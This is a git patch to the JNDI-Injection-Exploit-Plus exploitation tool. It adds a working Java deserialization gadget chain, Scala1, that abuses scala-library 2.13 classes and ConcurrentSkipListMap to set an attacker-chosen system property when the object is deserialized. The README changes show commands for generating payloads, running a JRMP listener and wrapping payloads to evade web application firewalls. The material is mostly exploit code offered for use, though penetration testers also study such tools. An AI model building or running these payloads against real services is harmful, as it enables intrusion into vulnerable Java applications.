From f9e097041b08d48289c3dae004996caa28718184 Mon Sep 17 00:00:00 2001 From: cckuailong <346813862@qq.com> Date: Mon, 24 Jun 2024 19:37:47 +0800 Subject: [PATCH] add chain scala1 --- README.md | 21 ++--- README_zh.md | 20 ++--- pom.xml | 8 +- src/main/java/payloads/Scala1.java | 83 +++++++++++++++++++ .../java/payloads/annotation/Authors.java | 1 + src/main/java/util/StubClassConstructor.java | 6 ++ 6 files changed, 118 insertions(+), 21 deletions(-) create mode 100644 src/main/java/payloads/Scala1.java create mode 100644 src/main/java/util/StubClassConstructor.java diff --git a/README.md b/README.md index 9c0ff94..ecbad40 100644 --- a/README.md +++ b/README.md @@ -35,7 +35,7 @@ Groovy (GroovyClassLoader) | @cckuailong | trustURLCodebase is false but have To Groovy (GroovyShell) | @cckuailong | trustURLCodebase is false but have Tomcat and Groovy in classpath Websphere Readfile | @cckuailong | trustURLCodebase is false but have WebSphere v6-v9 in classpath -#### 3. Deserailization Gadget (total: 74) +#### 3. Deserailization Gadget (total: 75) P.S. More Gadgets (:arrow_up: ) than ysoserial, welcome to PR more! ^_^ @@ -97,6 +97,7 @@ Myfaces1 |@mbechler| Myfaces2 |@mbechler| ROME1 |@mbechler |rome:1.0 ROME2 :arrow_up: |@firebasky |rome:1.0 +Scala1 :arrow_up: |@jarij |org.scala-lang:scala-library:2.13.x Spring1 |@frohoff |spring-core:4.1.4.RELEASE, spring-beans:4.1.4.RELEASE Spring2 |@mbechler |spring-core:4.1.4.RELEASE, spring-aop:4.1.4.RELEASE, aopalliance:1.0, commons-logging:1.2 Spring3 :arrow_up: |@cckuailong |spring-tx:5.2.3.RELEASE, spring-context:5.2.3.RELEASE, javax.transaction-api:1.2 @@ -137,7 +138,7 @@ Dirty | Insert a lot of dirty data to bypass WAF - Example ```shell -$ java -jar JNDI-Injection-Exploit-Plus-2.3-SNAPSHOT-all.jar -C "open -a Calculator" -D Jdk7u21 -W Xstream +$ java -jar JNDI-Injection-Exploit-Plus-2.5-SNAPSHOT-all.jar -C "open -a Calculator" -D Jdk7u21 -W Xstream ``` ![](./img/4.png) @@ -149,7 +150,7 @@ Hide class name to bypass WAF. - Example ```shell -$ java -jar JNDI-Injection-Exploit-Plus-2.3-SNAPSHOT-all.jar -C "open -a Calculator" -D Jdk7u21 -F +$ java -jar JNDI-Injection-Exploit-Plus-2.5-SNAPSHOT-all.jar -C "open -a Calculator" -D Jdk7u21 -F ``` Reference: [https://www.leavesongs.com/PENETRATION/utf-8-overlong-encoding.html](https://www.leavesongs.com/PENETRATION/utf-8-overlong-encoding.html) @@ -157,7 +158,7 @@ Reference: [https://www.leavesongs.com/PENETRATION/utf-8-overlong-encoding.html] #### Web service to return Deserial Gadgets ```shell -java -jar JNDI-Injection-Exploit-Plus-2.3-SNAPSHOT-all.jar +java -jar JNDI-Injection-Exploit-Plus-2.5-SNAPSHOT-all.jar ``` ```shell @@ -177,7 +178,7 @@ P.S. Param wrapper & output is opetional Run as ```shell -$ java -jar JNDI-Injection-Exploit-Plus-2.3-SNAPSHOT-all.jar [-C] [command] [-A] [address] +$ java -jar JNDI-Injection-Exploit-Plus-2.5-SNAPSHOT-all.jar [-C] [command] [-A] [address] ``` where: @@ -207,7 +208,7 @@ Points for attention: Run as ```shell -$ java -jar JNDI-Injection-Exploit-Plus-2.3-SNAPSHOT-all.jar [-C] [command] [-D] [Gadget] [-O] [base64/hex] +$ java -jar JNDI-Injection-Exploit-Plus-2.5-SNAPSHOT-all.jar [-C] [command] [-D] [Gadget] [-O] [base64/hex] ``` where: @@ -225,13 +226,13 @@ where: - JRMPListener ```shell -java -cp JNDI-Injection-Exploit-Plus-2.3-SNAPSHOT-all.jar exploit.JRMPListener CommonsCollections1 calc +java -cp JNDI-Injection-Exploit-Plus-2.5-SNAPSHOT-all.jar exploit.JRMPListener CommonsCollections1 calc ``` - JRMPClient ```shell -java -jar JNDI-Injection-Exploit-Plus-2.3-SNAPSHOT-all.jar -C ":" -D "JRMPClient" -O base64 +java -jar JNDI-Injection-Exploit-Plus-2.5-SNAPSHOT-all.jar -C ":" -D "JRMPClient" -O base64 ``` ## Examples @@ -243,7 +244,7 @@ Local demo: 1. Start the tool like this: ```shell - $ java -jar JNDI-Injection-Exploit-Plus-2.3-SNAPSHOT-all.jar -C "/System/Applications/Calculator.app/Contents/MacOS/Calculator" -A "127.0.0.1" + $ java -jar JNDI-Injection-Exploit-Plus-2.5-SNAPSHOT-all.jar -C "/System/Applications/Calculator.app/Contents/MacOS/Calculator" -A "127.0.0.1" ``` Screenshot: @@ -274,7 +275,7 @@ For More Examples: [Test-JNDI-Injection-Exploit-Plus](https://github.com/cckuail ### Deserialization Payloads ```shell -$ java -jar JNDI-Injection-Exploit-Plus-2.3-SNAPSHOT-all.jar -C "/System/Applications/Calculator.app/Contents/MacOS/Calculator" -D "Spring2" -O base64 +$ java -jar JNDI-Injection-Exploit-Plus-2.5-SNAPSHOT-all.jar -C "/System/Applications/Calculator.app/Contents/MacOS/Calculator" -D "Spring2" -O base64 ``` Base64 Output Result: diff --git a/README_zh.md b/README_zh.md index cf288f4..a17a2e7 100644 --- a/README_zh.md +++ b/README_zh.md @@ -12,14 +12,14 @@ JNDI-Injection-Exploit-Plus改写自welk1n大佬的JNDI-Injection-Exploit项目 - 远程Reference链 (3种) - 本地Reference链 (4种) -- 反序列化链(74种) +- 反序列化链(75种) P.S. 具体利用链名称及依赖见 [表格](./README.md) #### 使用方法 ``` -$ java -jar JNDI-Injection-Exploit-Plus-2.3-SNAPSHOT-all.jar [-C] [command] [-A] [address] +$ java -jar JNDI-Injection-Exploit-Plus-2.5-SNAPSHOT-all.jar [-C] [command] [-A] [address] ``` #### 参数说明 @@ -39,7 +39,7 @@ $ java -jar JNDI-Injection-Exploit-Plus-2.3-SNAPSHOT-all.jar [-C] [command] [-A] 1. 运行工具 ``` -$ java -jar JNDI-Injection-Exploit-Plus-2.3-SNAPSHOT-all.jar -C "/System/Applications/Calculator.app/Contents/MacOS/Calculator" -A "127.0.0.1" +$ java -jar JNDI-Injection-Exploit-Plus-2.5-SNAPSHOT-all.jar -C "/System/Applications/Calculator.app/Contents/MacOS/Calculator" -A "127.0.0.1" ``` ![](./img/1.png) @@ -64,7 +64,7 @@ class Test{ #### 使用方法 ``` -$ java -jar JNDI-Injection-Exploit-Plus-2.3-SNAPSHOT-all.jar [-C] [command] [-D] [Gadget] [-O] [base64/hex] +$ java -jar JNDI-Injection-Exploit-Plus-2.5-SNAPSHOT-all.jar [-C] [command] [-D] [Gadget] [-O] [base64/hex] ``` #### 参数说明 @@ -84,7 +84,7 @@ $ java -jar JNDI-Injection-Exploit-Plus-2.3-SNAPSHOT-all.jar [-C] [command] [-D] 1. 普通 ``` -$ java -jar JNDI-Injection-Exploit-Plus-2.3-SNAPSHOT-all.jar -C "/System/Applications/Calculator.app/Contents/MacOS/Calculator" -D "Spring2" -O base64 +$ java -jar JNDI-Injection-Exploit-Plus-2.5-SNAPSHOT-all.jar -C "/System/Applications/Calculator.app/Contents/MacOS/Calculator" -D "Spring2" -O base64 ``` ![](./img/3.png) @@ -93,12 +93,12 @@ $ java -jar JNDI-Injection-Exploit-Plus-2.3-SNAPSHOT-all.jar -C "/System/Applica - JRMPListener ``` -java -cp JNDI-Injection-Exploit-Plus-2.3-SNAPSHOT-all.jar exploit.JRMPListener CommonsCollections1 calc +java -cp JNDI-Injection-Exploit-Plus-2.5-SNAPSHOT-all.jar exploit.JRMPListener CommonsCollections1 calc ``` - JRMPClient ``` -java -jar JNDI-Injection-Exploit-Plus-2.3-SNAPSHOT-all.jar -C ":" -D "JRMPClient" -O base64 +java -jar JNDI-Injection-Exploit-Plus-2.5-SNAPSHOT-all.jar -C ":" -D "JRMPClient" -O base64 ``` #### 提供反序列化包装器 @@ -114,7 +114,7 @@ Dirty | 插入大量脏数据来绕过WAF检测 - 示例 ```shell -$ java -jar JNDI-Injection-Exploit-Plus-2.3-SNAPSHOT-all.jar -C "open -a Calculator" -D Jdk7u21 -W Xstream +$ java -jar JNDI-Injection-Exploit-Plus-2.5-SNAPSHOT-all.jar -C "open -a Calculator" -D Jdk7u21 -W Xstream ``` ![](./img/4.png) @@ -126,7 +126,7 @@ $ java -jar JNDI-Injection-Exploit-Plus-2.3-SNAPSHOT-all.jar -C "open -a Calcula - Example ```shell -$ java -jar JNDI-Injection-Exploit-Plus-2.3-SNAPSHOT-all.jar -C "open -a Calculator" -D Jdk7u21 -F +$ java -jar JNDI-Injection-Exploit-Plus-2.5-SNAPSHOT-all.jar -C "open -a Calculator" -D Jdk7u21 -F ``` 参考链接:[https://www.leavesongs.com/PENETRATION/utf-8-overlong-encoding.html](https://www.leavesongs.com/PENETRATION/utf-8-overlong-encoding.html) @@ -134,7 +134,7 @@ $ java -jar JNDI-Injection-Exploit-Plus-2.3-SNAPSHOT-all.jar -C "open -a Calcula #### 可以返回反序列化数据的web服务 ```shell -java -jar JNDI-Injection-Exploit-Plus-2.3-SNAPSHOT-all.jar +java -jar JNDI-Injection-Exploit-Plus-2.5-SNAPSHOT-all.jar ``` ```shell diff --git a/pom.xml b/pom.xml index f68c9f4..24eeaad 100644 --- a/pom.xml +++ b/pom.xml @@ -6,7 +6,7 @@ cckuailong JNDI-Injection-Exploit-Plus - 2.4-SNAPSHOT + 2.5-SNAPSHOT UTF-8 @@ -260,6 +260,12 @@ 26.0.1.Final + + org.scala-lang + scala-library + 2.13.6 + + org.springframework spring-tx diff --git a/src/main/java/payloads/Scala1.java b/src/main/java/payloads/Scala1.java new file mode 100644 index 0000000..982ea5a --- /dev/null +++ b/src/main/java/payloads/Scala1.java @@ -0,0 +1,83 @@ +package payloads; + +import payloads.annotation.Authors; +import payloads.annotation.Dependencies; +import scala.Tuple2; +import sun.reflect.ReflectionFactory; +import util.PayloadRunner; +import util.StubClassConstructor; + +import java.io.*; +import java.lang.invoke.MethodHandleInfo; +import java.lang.invoke.SerializedLambda; +import java.lang.reflect.Constructor; +import java.lang.reflect.Field; +import java.util.concurrent.ConcurrentSkipListMap; + + +@SuppressWarnings({"rawtypes"}) +@Dependencies({"org.scala-lang:scala-library:2.13.6"}) +@Authors({ Authors.JARIJ }) +public class Scala1 extends PayloadRunner implements ObjectPayload { + + public Object getObject(final String command) throws Exception { + String[] nameValue = command.split(":"); + String key = nameValue[0]; + String value = nameValue[1]; + + ReflectionFactory rf = + ReflectionFactory.getReflectionFactory(); + + Tuple2 prop = new scala.Tuple2<>(key, value); + + // Should be: 142951686315914362 + long versionUID = ObjectStreamClass.lookup(scala.Tuple2.class).getSerialVersionUID(); +// System.out.println("VersionUID: " + versionUID); + + SerializedLambda lambdaSetSystemProperty = new SerializedLambda(scala.sys.SystemProperties.class, + "scala/Function0", "apply", "()Ljava/lang/Object;", + MethodHandleInfo.REF_invokeStatic, "scala.sys.SystemProperties", + "$anonfun$addOne$1", "(Lscala/Tuple2;)Ljava/lang/String;", + "()Lscala/sys/SystemProperties;", new Object[]{prop}); + + Class clazz = Class.forName("scala.collection.View$Fill"); + Constructor ctor = clazz.getConstructor(int.class, scala.Function0.class); + Object view = ctor.newInstance(1, createFuncFromSerializedLambda(lambdaSetSystemProperty)); + + clazz = Class.forName("scala.math.Ordering$IterableOrdering"); + ctor = rf.newConstructorForSerialization( + clazz, StubClassConstructor.class.getDeclaredConstructor() + ); + + Object iterableOrdering = ctor.newInstance(); + + // on readObject, ConcurrentSkipListMap invokes comparator.compare(Object x, Object y); + // Initialize ConcurrentSkipList with a dummy comparator (a comparator that allows putting values into the list) + ConcurrentSkipListMap map = new ConcurrentSkipListMap((o1, o2) -> 1); + + // add the view entry to the map, when the view.iterable().next() is invoked, the System.setProperty lambda is executed + map.put(view, 1); + map.put(view, 2); + + // Replace the comparator with the IterableComparator + // IterableComparator is responsible for executing the view.iterable().next() on comparison + Field f = map.getClass().getDeclaredField("comparator"); + f.setAccessible(true); + f.set(map, iterableOrdering); + + return map; + } + + private static Object createFuncFromSerializedLambda(SerializedLambda serialized) throws IOException, ClassNotFoundException { + ByteArrayOutputStream baos = new ByteArrayOutputStream(); + ObjectOutputStream oos = new ObjectOutputStream(baos); + oos.writeObject(serialized); + + ObjectInputStream ois = new ObjectInputStream(new ByteArrayInputStream(baos.toByteArray())); + return ois.readObject(); + } + + public static byte[] getBytes (final String command, Boolean fusion) throws Exception { + return PayloadRunner.run(Scala1.class, command,fusion); + } +} diff --git a/src/main/java/payloads/annotation/Authors.java b/src/main/java/payloads/annotation/Authors.java index 14e207a..9813e8b 100644 --- a/src/main/java/payloads/annotation/Authors.java +++ b/src/main/java/payloads/annotation/Authors.java @@ -30,6 +30,7 @@ String CCKUAILONG = "cckuailong"; String YULEGEYU = "yulegeyu"; String Y4ER = "y4er"; + String JARIJ = "jarij"; String[] value() default {}; diff --git a/src/main/java/util/StubClassConstructor.java b/src/main/java/util/StubClassConstructor.java new file mode 100644 index 0000000..086da33 --- /dev/null +++ b/src/main/java/util/StubClassConstructor.java @@ -0,0 +1,6 @@ +package util; + +public class StubClassConstructor { + public StubClassConstructor() { + } +}